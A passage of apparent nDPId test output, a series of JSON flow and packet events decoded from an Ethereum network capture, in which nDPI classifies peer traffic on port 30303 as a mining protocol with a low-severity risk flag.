HcHaL+SmxYYPit8ZDD0AQGDBI97zkdb5Vg5h5AMJ3ltOege3+E2Esj4dt4J2X4J2X7hAbSf3keqm\/kX1w8mhO8tfUrHPkpEON98Bfi90NSvh60PrPxJjJwxphJtd9yYNAp6bvKKmXex+Pf1jNZwIZzl1LfhNhA3mbCqCdl+Cdl+4QOL5cPG1naCZem66zt1KAC6uDCfFoxJhecyNkCxirh\/KFEuDlQVcZ87QmYypugLnAbyvaDrG2A\/fgNNcBVjcu7P4TYS524U+gnZfgnZfuEAvzWrhvDjoXJOa\/ZdCbLgHiFuGktYvbPu1Kx0QfSszMjCe5P4b3hECkMlBLQo90CRjw1UcL0V+qQHcUkhH7ixE+E2ErGlePoJ2X4J2X7hAXGqY3uhYXKqMbPC9rcGcCUaWh+Dhi0uXFAXOGFtMr99hmG7UDnrqzTA\/o5MeRw5C1b8eG9l8GAevaeYZyFb6JfhNhLaioT2Cdl+Cdl+4QIU96ApVNnmCgofL7UIVwC0ussPQFE9BZpIkW9NYXxtm+4r+lcBEpjNfLr4w84vJM4LIgefP7wW0fAmtWWHpBj34TYRZo5RJgnklgnkluED1tj7tRebZlvZCTgHMIT8H0RpJXJ6gH+sJFUxXqZs38C\/hpzENTsCSDh1o2HUHvKg2FabU7+4S+HyXXU68T+Xi+E2EM01tNoLk1oLk1rhAfag2FjkUzZm46\/aJuVMW3oNNsPORtJDs86feqI9xjoUJ09giSja9nrnxBmA4a19j\/wmY0SxfQ5ijGeyrdMEjJvhNhCPk+oyCdl+Cdl+4QD9WPrST\/PNOA12+8bgX6kV4hJFBTbV9EgAQ6hcCTUo0f0CQNtNTkrUkC7hmmUaZ\/d9jh6CLjUr6pActojR+FlyEXhYgYA=="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
01875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1578508364649,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364649,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9Do1AACcR\/\/USimxDwKgBuHZfdl8EKXURHZU493PpfyH72WrYTKC\/rHcqyoxdJnlAGqx0IUPpfCDPrp1RbMe2PXXL\/Y0gUgYBHgBKX+LNKEC1qdxuKnvxvXevxKSr69S3rpBsxtD9oPpZta4nmfTh\/aybl9dDX7mZAQT5A7z5A7T4TYTKcBxqgnZfgnZfuECGOOF\/DUGQRmRtLD+gVTFTpr29WNtAkV6+wzvS1j2\/a652c2Up+3+CFGHvVHTbjE15jtDjeTNqp85aDPL\/y+3R+E2E1YVu74J6R4J6R7hACdquySb8h9bDyyzBVqIC4RVjIfrd43xNEhVl26cR8q+zCkRbVR7YOVOrP+cqMugQfvn+wj\/y\/7lEeLvwq\/902PhNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYSd5phXgnZfgnZfuEBkLPllDdiGnUJSXb9oWAEuO01k9HXnM4R6tvd0I0GkOXQUhl2VOHTo9e2RsOThxTPe4UrR1rsnalRZskcUYP8N+E2EuRnM0YJv8YJv8bhAWtd39T3gGPqV5\/kAxth9r0Z21IwC3OO8ijNQxmi2ggVwJqg2W08zX0qhgUwFTxRZ7CbZwhQtBb9MNGyCEZnVqfhNhDOhFwyCdl+Cdl+4QK0vqa8HM5bIAwN2G4EpFPUp1DIN0fK8JdET2pxyCxTou65T7kwDQcRwG9J87PVp8UWu5zbalyVDTlzNuCAazd\/4TYQ0CYBEgnZfgnZfuEDgMt94d8TQv+3IGK5MVBJ+471CdMGgEuFgADFs\/sfR77hApAbinmLOWlg0KBI76fx3iPiGmIjPc2DjV6Y5S+dt+E2EI+XoE4J2X4J2X7hAIvfQZKlYQVCc0QQPwdirlpv8ThVD2qtJQ\/hHeZ\/oRum3Dym8iOrz0uJZ5KMKMAHJAax\/7cDcr+ygJhYzzSAsNPhNhBLbp5+Cdl+Cdl+4QDCSBiBQ8iLhaImD5AvOD3AYyHE8BHtrPD\/FIoEA85BtCVHcvr36Z16jGH+pCLvpF81d5q4peXkgIkeh9Urflwf4TYR82eu0gnZfgnZfuEBXvLisck0JGnGrgRqWL\/bDyJ8qsCwpUwM0sk3OmDN\/PU2NXINnOwgDzonj2zUWAZS5\/UZawhYcs8O8n12+UDva+E2EXN5bw4Jv8YJv8bhAmWLd+VP5u1ibBrgKagKp3py+njifftSzD32rmGG+J3QgFhiB28tAr4XUS33ESEXzhatHLB80xoRt5yzzOLxbKvhNhCPEd72CeRmCeRm4QEsv12Yq4nMYX4LQY5r9d7BNkGpNa1KOs2Gd6C4u3NZleL+d2v4Anfsu4uoql9o1Ksl2BdYCVg1KygwMa9DuSGuEXhYgYA=="}
01013{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1578508364650,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364650,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFDo5AACcRAm0SimxDwKgBuHZfdl8BsYIGz0wiJjKaUzFXr6IJm0KhJJHh14UxEkvPcQ\/Rk7Fgvbo\/feZhAIkP1PMVdfnmkT0ej4RbRZLeGs4r7KmIG\/NoSRob2DIRR9KSxxR5ApQK0GtL+DiOoUZ+LI2SWe0lCUL6AQT5AUT5ATz4TYSnR61sglIIglIIuEB7ukp3Oj6MzbNl3nDN0jQiNpC1V5v5rn9Rt7ZEw1VBzFla5k6rBHcylJhBRGAYzBX+17ncBsVtgVPJrKMh7nvV+E2EEop59oKMoIKMoLhASS3OSNDf3z8b3OyL7l\/Hx\/k821PEzINQHbZfniqNPVksrwSkp6jrG6UYCpQoXvgKZOetorWlposBzYkgatgcWfhNhDP\/TVmCdl2Cdl24QM3iC4E\/jtROh\/yrXbgvFZypcqA1E0NM1pmVBNhPzAEVOKwUDY19JR7HzoFwywH46oqp8Nqzrz5YKF3TzRCEzqb4TYS57vnMglLcglLcuECRN7VxzSUAEA2k0pdpV6OAanNBmMgqxX6AGOkM+qhp9apzS9PVbGdlMMSUUvnshxBsN5liOIkWGjzwRsyI7kXrhF4WIGA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1578508364654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHl8oAAEARbG\/AqAG4gAAzjHZfdl8AswwF15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"}
00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"}
